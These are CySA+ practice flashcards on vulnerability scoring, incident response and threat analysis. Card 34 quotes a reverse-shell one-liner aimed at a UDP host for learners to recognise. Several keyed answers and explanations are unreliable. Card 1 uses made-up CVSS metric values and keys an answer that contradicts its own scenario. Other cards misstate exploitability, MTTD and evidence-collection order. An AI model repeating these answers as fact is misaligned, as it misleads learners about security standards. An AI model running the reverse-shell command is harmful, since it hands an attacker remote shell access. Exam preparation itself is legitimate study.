CySA+ (CS0-003) Flashcards

1
Q

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

A

Correct Answer: A

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): Known (I:K)
Availability Impact (A): Low (A:L)

B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
Attack Vector (AV): Adjacent Network (AV:K)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): High (PR:H)
User Interaction (UI): Required (UI:R)
Scope (S): Changed (S:C)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): Low (A:L)

C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): Required (UI:H)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: Low (C:L)
Integrity Impact (I): None (I:N)
Availability Impact (A): High (A:H)

D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Attack Vector (AV): Local (AV:L)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): Required (PR:R)
User Interaction (UI): Required (UI:R)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): Low (I:L)
Availability Impact (A): High (A:H)

These vectors provide information about the severity of security vulnerabilities. They consider factors like attack vectors, complexity, privileges required, user interaction, and impact on confidentiality, integrity, and availability. If you have any specific questions about these vectors or need further clarification, feel free to ask! 😊

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM
B. IDS
C. PKI
D. DLP

A

Correct Answer: D

The best tool for preventing the exposure of Personally Identifiable Information (PII) outside of an organization is DLP (Data Loss Prevention).

DLP solutions help monitor, detect, and prevent sensitive data from being leaked or transmitted to unauthorized recipients. They can enforce policies to safeguard PII, such as credit card numbers, Social Security numbers, and other confidential information.

IDS (Intrusion Detection System) detects network threats.

PKI (Public Key Infrastructure) manages digital certificates for secure communication.

PAM (Privileged Access Management) focuses on controlling access to critical systems and accounts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan

A

Correct Answer: D, E

D. Affected hosts: Definitely! This information helps pinpoint where vulnerabilities exist.
E. Risk score: Yes, including the risk score provides context on the severity of each vulnerability.

Items like “Lessons learned,” “Service-level agreement,” “Playbook,” and “Education plan” are not typically part of a vulnerability scan report. They might be relevant for other security documentation but aren’t directly related to scan results.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing

A

Correct Answer: A

Response - Incident response activities include detection, analysis, containment, eradication, recovery, communication, and documentation.

Remediation - Remediation activities include applying patches, fixing misconfigurations, updating security policies, improving access controls, and implementing other corrective measures.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company’s internal routers

A

Correct Answer: B

Based on the information provided, it seems that option B is the most likely scenario.

An on-path attack by an internal actor could be forcing users to connect via port 80 (HTTP) instead of port 443 (HTTPS). This manipulation could compromise security by intercepting or redirecting traffic. It’s essential for the company to investigate further and take appropriate measures to secure their network and user accounts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

  1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
  2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
  3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

A

Correct Answer: B

CAP.SHIELD

Based on the security policy’s criteria, vulnerabilities B (CAP.SHIELD) and D (THANOS.GAUNTLET) have the highest priority in patching because they have the highest impact on confidentiality, which takes precedence over availability.

B. CAP.SHIELD - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (External System)

Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest

D. THANOS.GAUNTLET - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Internal System)

Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest

According to the policy, external systems should be prioritized over internal systems.

Therefore, vulnerability B should be addressed first.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan

A

Correct Answer: A

The goal of the business continuity program is to ensure that the organization is able to
maintain normal operations even during an unexpected event. When an incident strikes,
business continuity controls may protect the business’ core functions from disruption.
The goal of the disaster recovery program is to help the organization quickly recover
normal operations if they are disrupted. An incident may cause service disruptions that
would trigger the disaster recovery plan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications

A

Correct Answer: A

Deploy a CASB and enable policy enforcement (Option A): A Cloud Access Security Broker (CASB) acts as an intermediary between users and cloud services. It provides visibility into cloud usage, enforces security policies, and helps prevent unauthorized access. By deploying a CASB and enforcing policies, you can gain better control over cloud applications and reduce the risk associated with shadow IT.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN
B. Vulnerability scanner
C. DNS
D. Web server

A

Correct Answer: C

Given that the organization was impacted by a DDoS attack, the team should review the DNS logs first. DNS (Domain Name System) logs can provide valuable information about the domain resolution process, including any unusual or malicious requests. Analyzing DNS logs can help identify patterns associated with the attack and provide insights into the source of the traffic. Once the DNS logs have been reviewed, the team can proceed to examine other relevant logs, such as web server logs or CDN logs, to further investigate the incident.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation

A

Correct Answer: D

The current stage of the Cyber Kill Chain that the threat actor is operating in is D. Exploitation. At this stage, the attacker has successfully exploited a vulnerability or weakness to gain unauthorized access to the network. Their goal is to maintain access and continue their attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives

A

Correct Answer: B

The analyst is witnessing the reconnaissance phase. During this stage, attackers gather information about their target, which often includes scanning external-facing assets to identify vulnerabilities. It’s a critical step before launching an attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning

A

Correct Answer: C, E

  1. Social Engineering Attack (C): This seems likely. Targeting only administrators with a concealed URL could be an attempt to manipulate them into clicking the link, potentially compromising their credentials or installing malicious software.
  2. Obfuscated Links (E): Concealing the URL suggests obfuscation. Cybercriminals often use obfuscated links to evade detection by security tools and trick users into visiting malicious sites.

The other options are less relevant in this context. Beaconing (A) typically refers to a compromised system communicating with a command-and-control server. Domain Name System (DNS) hijacking (B) involves redirecting DNS queries to malicious servers. On-path attacks (D) and Address Resolution Protocol (ARP) poisoning (F) are less likely explanations for this scenario.
Remember to investigate further and take appropriate action to protect your network. If you need additional assistance, feel free to ask!

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CD flow
D. Implement proper input validation for any data entry form

A

Correct Answer: C

To mitigate recurring vulnerabilities in a critical application throughout the software development lifecycle (SDLC), Use application security scanning as part of the pipeline for the CI/CD flow.

Here’s why:
Continuous Integration/Continuous Deployment (CI/CD): Integrating security scanning into the CI/CD pipeline ensures that security checks are performed automatically during each stage of development, from code commits to deployment. This approach catches vulnerabilities early and prevents them from propagating to production.
Automation: By automating security scans, you reduce the reliance on manual testing, which can be error-prone and time-consuming. Automated scans can identify common vulnerabilities (such as injection flaws, cross-site scripting, and insecure configurations) consistently and efficiently.
Shift Left: Incorporating security scanning early in the SDLC (the “shift left” approach) allows developers to address vulnerabilities during coding and testing phases. This proactive approach prevents issues from reaching production.

While options A, B, and D are also important, they address different aspects of security:

A (Red Team Exercises): Useful for assessing overall security posture but not necessarily for identifying specific recurring vulnerabilities.

B (Checking Coding Libraries): Important for maintaining library hygiene but doesn’t directly address the recurring vulnerabilities.

D (Input Validation): Essential for preventing specific types of vulnerabilities (e.g., injection attacks), but it’s not a comprehensive solution for all recurring issues.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows

A

Correct Answer: A

The systems that cannot be upgraded due to a vendor appliance represent proprietary systems. These appliances are likely tightly integrated with the critical systems, making it difficult to apply updates or patches.

Unlike legacy systems, which are older but still supported, proprietary systems often lack the flexibility to accommodate standard upgrades.

Unsupported operating systems, on the other hand, refer to those that no longer receive security updates from their vendors.

The issue here seems to be the proprietary nature of the vendor appliance, hindering the necessary upgrades.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification

A

Correct Answer: B

Conducting a thorough review involving all relevant teams allows for knowledge sharing, identification of gaps, and process improvements. It promotes collaboration and learning from the incident.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing

A

Correct Answer: B

Given the scenario, static analysis is often the first step. It allows the analyst to identify suspicious patterns, check for hardcoded credentials, and understand the binary’s behavior without executing it. If further investigation is needed, reverse engineering becomes valuable.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address

A

Correct Answer: D

When preserving sensitive information before isolating a server, the routing table (option D) should be collected first. The routing table contains critical network configuration details, which can help identify potential attack vectors and compromised routes. By capturing this information early, the incident response team can ensure that essential data is preserved for further analysis.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis:
Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder

B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules

C. Security application user errors:
Search the error logs for signs of users having trouble with the security application. Look up the user’s phone number - Call the user to help with any questions about using the application

D. Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine

A

Correct Answer: B

Analyzing firewall logs for Indicators of Compromise (IoCs) is a common security task. Automation can efficiently process large log volumes, identify patterns, and trigger blocking rules.

Automation feasibility: Highly feasible (commonly automated).

D could end up adding common email domains to the block list and limit communication that is unintended.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer

A

Correct Answer: D

Under the terms of the Payment Card Industry Data Security Standard (PCI DSS), an organization that experiences a breach of customer transactions should report the breach to the card issuer.

The card issuer is responsible for handling the incident and notifying the appropriate parties, including law enforcement if necessary.

The other options—such as the PCI Security Standards Council, local law enforcement, and federal law enforcement—may also be involved in the investigation, but the primary reporting responsibility lies with the card issuer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts

A

Correct Answer: A

Given the recent investments in SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation, and Response), and a ticketing system, the best metric for an organization to focus on would be the mean time to detect (MTTD).

MTTD measures the average time it takes to identify and respond to security incidents. A shorter MTTD indicates a more efficient detection and response process, which is crucial for minimizing the impact of security threats.

While other metrics (such as alert volume, quantity of intrusion attempts, and number of exploits by tactic) provide valuable insights, MTTD directly reflects the effectiveness of the security infrastructure and processes. It helps organizations assess their ability to detect and mitigate threats promptly.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud

A

Correct Answer: B

Cloud-Specific Misconfigurations: Traditional vulnerability scanners may not fully detect cloud-specific misconfigurations. Cloud environments have unique security challenges, such as misconfigured permissions, network settings, and storage access. Ensure your vulnerability management tools account for these cloud-specific issues.

Migration of Scanners: While migrating your current scanners to the cloud (Option A) is an option, it’s essential to evaluate whether they are optimized for cloud environments. Some scanners may need adjustments or replacements to effectively scan cloud resources.

Vulnerability Scans from the Cloud: Performing vulnerability scans directly from the cloud (Option D) is recommended. This approach ensures that scans originate within the same environment, providing accurate results and minimizing network latency.

Coverage for IaaS Systems: Existing vulnerability scanners can indeed scan IaaS systems (Option C).

However, ensure they are configured correctly to assess cloud-based infrastructure. Consider integrating cloud-native security tools for comprehensive coverage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional

A

Correct Answer: B

When conducting an investigation related to HR or privacy matters, it’s crucial to handle the process carefully.

Here are some steps to ensure compliance and safeguard privacy:
Privacy and Confidentiality: During investigations, employees have the right to privacy and confidentiality. Information shared during the investigation should only be disclosed on a need-to-know basis. This ensures that sensitive details remain confidential and protects the privacy of all parties involved.

Given the options, B aligns with best practices for maintaining privacy. By ensuring that case details do not include user-identifiable information and restricting access to authorized personnel, you can protect privacy while conducting a thorough investigation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster

A

Correct Answer: A

A. Agree on the goals and objectives of the plan as the first step when establishing a disaster recovery plan (DRP). While conducting a risk analysis is crucial, defining the goals and objectives ensures alignment with business needs and sets the direction for the entire plan. Once you have clear objectives, you can proceed with other essential steps in the DRP process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass

A

Correct Answer: D

The security program achieved this improvement by implementing a Single pane of glass approach. By integrating security controls into a SIEM (Security Information and Event Management) system, the analyst no longer needed to switch between multiple tools. This unified view streamlined incident response and reduced Mean Time to Respond (MTTR).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing
B. Implementation
C. Validation
D. Rollback

A

Correct Answer: C

You test the patch in a sandbox environment before you apply it, and after you apply it, you validate.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

When starting an investigation, which of the following must be done first?

A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses

A

Correct Answer: B

Securing the scene is typically the first step in an investigation. It ensures that evidence remains undisturbed and allows investigators to proceed methodically. Once the scene is secure, they can then proceed with other steps, such as collecting evidence and interviewing witnesses.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
D. Subject matter experts on the team should communicate with others within the specified area of expertise

A

Correct Answer: A

The Computer Security Incident Response Team (CSIRT) lead plays a crucial role in determining communication during a security incident.

Here’s how they typically approach it:

Reviewing Incident Response Plan (IRP): The lead should start by reviewing the organization’s incident response policy or plan. This document outlines the procedures, roles, and responsibilities during incidents. It helps guide communication decisions based on predefined protocols1.

Analyzing the Incident:
The CSIRT analyzes the incident to determine:
Scope: Which users, systems, and services are impacted.
Origin: Who or what caused the incident.
Occurrence: Which attack methods are being used or vulnerabilities exploited.

Internal Communications:
The lead manages internal communications during or immediately after incidents. This includes updates to team members and relevant stakeholders.

They work closely with other team leads (e.g., legal, data protection, communications) to ensure effective communication across the organization.

In summary, the CSIRT lead relies on the IRP, collaborates with other teams, and ensures timely and accurate communication throughout the incident response process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists

A

Correct Answer: C

Let’s break down the options:

Firewall logs: These logs capture network traffic and can provide insights into attempted connections, blocked traffic, and potential threats. While they are valuable for monitoring network activity, they might not directly produce the high-level executive briefing data needed.

Indicators of compromise (IoCs): IoCs are specific artifacts or patterns associated with known threats (e.g., malicious IP addresses, file hashes, domain names). Collecting IoCs from threat intelligence feeds can help identify potential threats. However, IoCs alone may not provide a comprehensive view for an executive briefing.

Risk assessment: Risk assessments evaluate the likelihood and impact of various threats to an organization. They consider vulnerabilities, threat actors, and potential consequences. Conducting a risk assessment can yield valuable data for an executive briefing, especially when prioritizing security efforts.

Access control lists (ACLs): ACLs define permissions for network resources (e.g., who can access specific servers or services). While ACLs are essential for security, they focus on access control rather than broader threat analysis.

Given the context of creating an executive briefing:

C. Risk assessment. It provides a holistic view of threats, vulnerabilities, and their potential impact, aligning well with executive-level decision-making.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal

A

Correct Answer: A

The behavior described by the analyst is beaconing. Beaconing refers to a pattern where a compromised device or software communicates with a command-and-control (C2) server at regular intervals, often with additional data or specific patterns in the communication.

In this case, the device is sending HTTPS traffic with extra characters in the header to a known-malicious IP address.

This behavior is typical of beaconing, which allows the attacker to maintain control over the compromised system and receive instructions or updates. The other options (cross-site scripting, buffer overflow, and PHP traversal) are not directly related to this specific behavior.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

A

Correct Answer: C

The ftp-data display filter specifically captures the data channel of the FTP session, which contains the actual file transfer data.

By following the TCP streams associated with the ftp-data filter, the analyst can reconstruct the entire file transfer, including the files being downloaded.

Options A and B are not relevant in this context:

Option A (ftp.active.port) refers to the active mode port for FTP connections, which is not related to viewing file contents.

Option B (tcp.port==20) filters packets based on the destination port 20, which is used for FTP data connections in active mode. However, this won’t show the complete file transfer data.

Option D is incorrect:
Navigating to the File menu and selecting FTP from the Export objects option allows exporting FTP objects (such as files) from the capture, but it doesn’t directly show the contents of the downloaded files.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A. SLA
B. MOU
C. NDA
D. Limitation of liability

A

Correct Answer: A

The SOC (Security Operations Center) manager should review the Service Level Agreement (SLA). The SLA outlines the agreed-upon response times, including how quickly vulnerabilities should be addressed and remediated. It ensures that the team meets contractual obligations related to incident response and vulnerability management. The SLA typically specifies response times for different severity levels of incidents, which helps maintain customer satisfaction and adherence to contractual commitments.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery

A

Correct Answer: A

The phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target is A. Command and control. During this phase, the attacker establishes a channel for remote control and communication with the compromised system. This allows them to issue commands, exfiltrate data, and maintain persistence.

The Cyber Kill Chain is a framework that explains how attackers move through networks to identify vulnerabilities and exploit them. It’s essential for understanding the stages of a cyberattack and implementing preventive measures. Here are the seven stages:

Reconnaissance: In this initial stage, attackers research potential targets, identify vulnerabilities, and explore existing entry points. Both online and offline methods are used.

Weaponization: After reconnaissance, attackers create malware specifically tailored for the identified target. This could involve modifying existing tools or developing new ones.

Delivery: Cyberweapons are used to infiltrate the target’s network. This can happen through phishing emails with malware attachments or exploiting hardware/software vulnerabilities.

Exploitation: Attackers take advantage of discovered vulnerabilities to further infiltrate the network. They may move laterally across the network to reach their targets.

Installation: Malware is installed on the compromised system, allowing attackers to maintain access and control.

Command and Control (C2): Attackers establish communication channels to control the compromised system remotely. This step enables ongoing operations.

Actions on Objectives: Finally, attackers achieve their goals, which could include data theft, disruption, or other malicious activities12.
Feel free to ask if you’d like more details or need assistance with anything else! 😊

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

A

Correct Answer: B

Reduced network traffic: Pre-installed agents reduce the need for frequent network scans, replacing them with event-driven or periodic scheduled scans.

No IP limitation: Agent-based scanning is not limited by IP, making it accessible even for assets using dynamic addressing or located off-site behind private subnets.

Geographically distributed environments: Agent-based scanning works well in widely distributed environments or with numerous remote employees1.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

A

Correct Answer: B

sh -i: This part of the command invokes the Bourne shell (sh) with an interactive session (-i).

> & /dev/udp/10.1.1.1/4821: The >& redirects both standard output and standard error to the specified UDP address (10.1.1.1) and port (4821).

0>$l: This redirects standard input (0) to an undefined variable ($l).

In a reverse shell attack, the attacker sets up a listener on their machine (in this case, the UDP address 10.1.1.1), and the compromised system connects back to the attacker, allowing them to execute commands remotely.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

A

Correct Answer: B

Weaponization refers to the actual use of an exploit to deliver a payload or cause harm.

In this case, the exploit being actively used to deliver ransomware significantly increases the severity of the vulnerability.

Other factors, such as scope, CVSS (Common Vulnerability Scoring System), and asset value, may also play a role, but weaponization is the primary reason for the score escalation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

A

Correct Answer: C

Agent-based scanning involves installing a lightweight software agent on each endpoint. These agents perform the vulnerability assessment locally on the device, thereby not requiring remote access to sensitive data. The results are then sent back to a centralized server for analysis.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

B. function x() { info=$(ping -c 1 $1 | awk -F “/” ’END{print $5}’) && echo “$1 | $info” }

C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }

D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

A

Correct Answer: D

To identify anomalies on the network routing accurately, the security analyst should use a function that can help in gathering information related to the network routing of a given IP address. Among the provided options, the most suitable function for this purpose is:

D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Explanation:

This function uses the “traceroute” command with a maximum hop count of 40 to trace the route to the target IP address.
The “awk ‘END{print $1}’” command is used to extract the last hop or router in the route, which can be valuable for identifying anomalies or unexpected routing paths.
Finally, it echoes the target IP address and the last hop/router in the route as output, which can help the analyst identify any unexpected or suspicious routing behavior.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management

A

Correct Answer: B

While other options (such as step-up authentication for administrators, password complexity standards, and mobile device management) are important for overall security, they may not directly address the specific issue of sensitive information leakage via file sharing services. Employee awareness and training, on the other hand, directly mitigate this risk by promoting responsible behavior and informed decision-making.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

